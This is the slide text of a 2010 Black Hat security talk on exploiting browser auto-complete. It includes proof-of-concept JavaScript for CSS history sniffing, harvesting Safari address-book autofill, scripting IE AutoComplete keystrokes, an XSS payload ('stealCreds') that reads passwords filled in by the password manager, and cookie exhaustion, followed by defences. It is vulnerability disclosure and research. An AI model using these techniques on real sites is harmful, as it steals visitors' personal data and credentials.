breaking browsers: hacking auto-complete (blackhat usa 2010)

Breaking Browsers: Hacking Auto-CompleteJeremiah GrossmanFounder & Chief Technology Officer

Blog: http://jeremiahgrossman.blogspot.com/Twitter: http://twitter.com/jeremiahgEmail: [email protected] special thanks to:

Robert “RSnake” Hansen (SecTheory)Daniel Veditz (Mozilla)Microsoft Security Response CenterMike Bailey (MAD Security)Chris Evans (Google)

http://www.it-defense.de/en/it-defense-2010/program/presentations.html#c321




http://jeremiahgrossman.blogspot.com


http://twitter.com/jeremiahg


mailto:[email protected]


© 2010 WhiteHat Security, Inc. |

• WhiteHat Security Founder & Chief Technology Officer

• 2010 RSA Security Bloggers Award (Best Corporate Blog)

• InfoWorld's CTO Top 25 (2007)

• 5th most popular “Jeremiah” according to Google

• Brazilian Jiu-Jitsu Brown Belt

• Narcissistic Vulnerability Pimp

• Former Yahoo! information security officer

me.

http://www.webappsec.org




Web Security

Browser SecurityWebsite Security

2,000+ websites

© 2010 WhiteHat Security, Inc. | Page

Global Internet: 1.67 Billion People

4

Internet

1.67 billion peoplehttp://en.wikipedia.org/wiki/Global_Internet_usage

206 millionwebsites

http://riosec.com/how-to-create-a-gifar





Largest Market-share

Exploiting Features Enabled by Default

Bonus for Design Flaws

What the “bad guys” target...


July, 2010http://www.netmarketshare.com/browser-market-share.aspx?qprid=2

Browser Version Market Share






By the numbers, of people

IE 8 IE 6 FF 3.5/3.6 IE 7 Chrome Safari 4/5

491 Million

284 Million

351 Million

197 Million

103 Million

83 Million

36 Mil307 Mil


Sandboxes, code security, memory protection, black-lists, green URL bars, anti-phishing, SSL warnings, etc.

Security Features


I know where you’ve been... (on the way out)

FF 3.7 Nightlies Safari v5

http://blog.mozilla.com/security/2010/03/31/plugging-the-css-history-leak/http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

VisitedUnvisited

a:visited#link { background: url('/capture.cgi?http://bank/'); }

Classic CSS History Hack

var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");

In the “visited” pseudo-class, everything except color style properties are ignored.

getComputedStyle lies and returns the “unvisited” link values.





http://login.yahoo.com/'




We often still know where you are logged-in, but that’s another discussion.

CSRF Login-Detection


I want to know your name, who you work for, where you live, your email address, etc.Right at the moment you a visit a website. Even if you’ve never been there before, let alone entered information.


Safari Address Book Autofill (enabled by default)

<form><input type="text" name="name"><input type="text" name="company"><input type="text" name="city"><input type="text" name="state"><input type="text" name="country"><input type="text" name="email"></form>


Address Card Autofill works even when you’ve NEVER entered personal data on ANY WEBSITE.


DEMO

15

Step 1) Dynamically create input fields with the pre-set attribute names.

Step 2) Cycle through the alphabet initiating text events until a form value populates.

Step 3) Profit! -- Steal data with JavaScript.

var event = document.createEvent('TextEvent');event.initTextEvent('textInput', 1, 1, null, char);

input.value = "";input.selectionStart = 0;input.selectionEnd = 0;input.focus();input.dispatchEvent(event);!!setTimeout(function() { if (input.value.length > 1) { // capture the value; }}, 500);

Safari v4 / v5

*transparency is even more fun!*


What about stealing other auto-fill data, data that was previously entered?


Internet Explorer 8 = SAFE


AutoComplete: User-supplied form values are shared across different websites by attribute “name”. For example, email addresses entered into a field on website A populates the autofill for the same field name on website B, C, D, etc.

<input type="text" name="email">


DEMO - Down, Down, Enter// hit down arrow an incrementing number of times.// separate with time to allow the GUI to keep pacefor (var i = 1; i <= downs; i++) { time += 30; // time padding keyStroke(this, 40, time); // down button}! !time += 15; // time paddingkeyStroke(this, 13, time); // enter button

// initiate keystroke on a given objectfunction keyStroke(obj, code, t) { //create new event and fire var e = document.createEventObject(); e.keyCode = code; setTimeout(function() {obj.fireEvent("onkeydown", e); }, t);} // end keyStroke

Security Basis, and an Internet Explorer data stealerhttp://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.htmlAndrea Giammarchi, Ajaxian Staff

http://www.3site.eu/examples/hackedform/

http://www.3site.eu/examples/hackedform/






Search termsCredit card numbers and CCVsAliasesContact informationAnswers to secret questionsUsernamesEmail addresses...


AutoComplete is NOT enabled by default, but Internet Explorer asks if the user if they would like to enable the feature after filling out a non-password form.


Have the email address, but need the password


Remember Password

24

Many Web Browsers have “password managers,” which provide a convenient way to save passwords on a “per website” basis.

<form method="post" action="/">E-Mail: <input type="text" name="email"><br />Password: <input type="password" name="pass"><br /><input type="submit" value="Login"></form>

function stealCreds() { var string = "E-Mail: " + document.getElementById("u").value; string += "\nPassword: " + document.getElementById("p").value; return string;}document.write('<form method="post" action="/">E-Mail: <input id="u" type="text" name="email" value=""><br>Password: <input id="p" type="password" name="password" value=""></form>');

setTimeout('alert(stealCreds())', 2000);


If a website with a saved password is vulnerable to XSS, the payload can dynamically create login forms, which executes the browser’s password auto-complete feature. Since the payload is on the same domain the username / password can be stolen.

DEMO**


Hidden Firefox Protection

26

about:config

signon.autofillForms


Long-term problem, even when “fixed”

27

Mass distribute auto-complete code (ad network), cookie affected users with a unique ID, and setup a callback Web service.

DOMAIN: whoisthispersonvar person = {name: ‘name’,email: ‘name’,}

identify(person);

DOMAIN: website<script>function identify (person) {...}</script><script src=”http://iknowyourname.com/?cb=identify”>

http://whoisthisperson.com





Firefox: Global 3,000 cookie max cap. 50 cookies can be set per hostname. Therefore, we need 1 domain with 60 subdomains.

https://bugzilla.mozilla.org/show_bug.cgi?id=321624http://kuza55.blogspot.com/2008/02/understanding-cookie-security.htmlhttp://www.nczonline.net/blog/2008/05/17/browser-cookie-restrictions/

<script>for (var i = 1; i <= 60; i++) { img = new Image(); img = "http://the" + i + ".cookiemonster.com/cgi-bin/cookie.pl";}</script>

P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT";Set-Cookie: cNAME_1=_cValue_1;Set-Cookie: cNAME_2=_cValue_2;Set-Cookie: cNAME_3=_cValue_3;...

The Hackers Way - (Cookie Exhaustion)







http://the

http://the


$300 dollar hack


Disable Auto-Complete in the Web browser

Remove persistent data (History, Form Data, Cookies, LocalStorage, etc.)

NoScript (Firefox Extension), 1Password, etc.

<form autocomplete="off"><input type="text" autocomplete="off" />

What to do...


Jeremiah GrossmanFounder & Chief Technology Officer

Blog: http://jeremiahgrossman.blogspot.com/Twitter: http://twitter.com/jeremiahgEmail: [email protected]

Questions?





